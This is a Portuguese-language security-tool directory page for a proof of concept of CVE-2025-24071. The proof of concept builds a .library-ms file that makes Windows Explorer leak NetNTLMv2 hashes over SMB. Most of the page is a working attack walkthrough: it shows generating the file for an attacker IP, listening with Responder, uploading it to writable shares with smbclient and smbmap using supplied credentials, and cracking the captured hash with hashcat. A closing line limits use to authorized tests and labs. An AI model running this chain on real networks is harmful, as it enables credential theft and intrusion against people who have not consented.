Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
PoC-CVE-2025-24071 — PoC em Python para CVE-2025-24071 que cria um arquivo .library-ms para forçar o Windows Explorer a vazar hashes NetNTLMv2 via SMB para captura e quebra. | Kitploit
Ferramentas/GitHubGitHub/daemon-404/poc-cve-2025-24071
Ataques de SenhaAnálise de VulnerabilidadesExploraçãoSegurança de RedeCTFTestes de PenetraçãoRed TeamingLabs e Prática
GitHubdaemon-404/poc-cve-2025-24071

PoC-CVE-2025-24071

PoC em Python para CVE-2025-24071 que cria um arquivo .library-ms para forçar o Windows Explorer a vazar hashes NetNTLMv2 via SMB para captura e quebra.

Ver Repositório
há 13h 56mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

❀ coerce-library

CVE-2025-24071 — coerção NTLM via .library-ms (método SMB / TAR)

Theme: Rosé Pine Python: 3.9+ CVE: 2025-24071

Protocol: SMB Capture: NetNTLMv2 Use: Lab / CTF


❀ O que faz

Solicita o seu IP de ataque e um nome de arquivo, escreve um .library-ms apontando para \\<IP>\share, e o empacota em exploit.tar. Quando o Explorer navega pela pasta onde o .library-ms solto é colocado, ele resolve automaticamente esse caminho UNC e vaza o NTLMv2 da conta para o seu listener — sem precisar de clique.

⚠️ O .library-ms solto é o que dispara — não o .tar. Um .tar parado no compartilhamento é inerte; o Explorer não interpreta tarballs. Você precisa colocar o próprio .library-ms no compartilhamento como um arquivo solto. Como fazer isso depende da ferramenta (abaixo).


❀ Execute

root@kitploit:~
uv run coerce_library.py      # or: python3 coerce_library.py
root@kitploit:~
Attack IP [10.10.14.197]:
File name [documents]:
[+] documents.library-ms  ->  \\10.10.14.197\share
[+] packed into exploit.tar

❀ Em seguida

1) Escute

root@kitploit:~
sudo responder -I tun0

2) Coloque o .library-ms em um compartilhamento gravável

smbclient — envie o .tar, extraia-o no lado do servidor com tar x (deixa o .library-ms solto ao lado dele):

root@kitploit:~
smbclient //<TARGET>/<SHARE> -U '<DOMAIN>/<USER>%<PASS>' -c 'put exploit.tar; tar x exploit.tar'

smbmap — não tem etapa de extração, então envie o .library-ms solto diretamente (enviar o .tar aqui não faz nada — ele não consegue descompactá-lo):

root@kitploit:~
smbmap -H <TARGET> -d <DOMAIN> -u <USER> -p <PASS> --upload exploit.library-ms 'IT/exploit.library-ms'

Confirme que ele chegou solto no compartilhamento:

root@kitploit:~
smbclient //<TARGET>/<SHARE> -U '<DOMAIN>/<USER>%<PASS>' -c 'ls' | grep library

3) Quebre o NTLMv2 capturado

root@kitploit:~
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

☧ apenas para uso autorizado em testes de penetração / CTF / laboratório ☧

Baixar ferramenta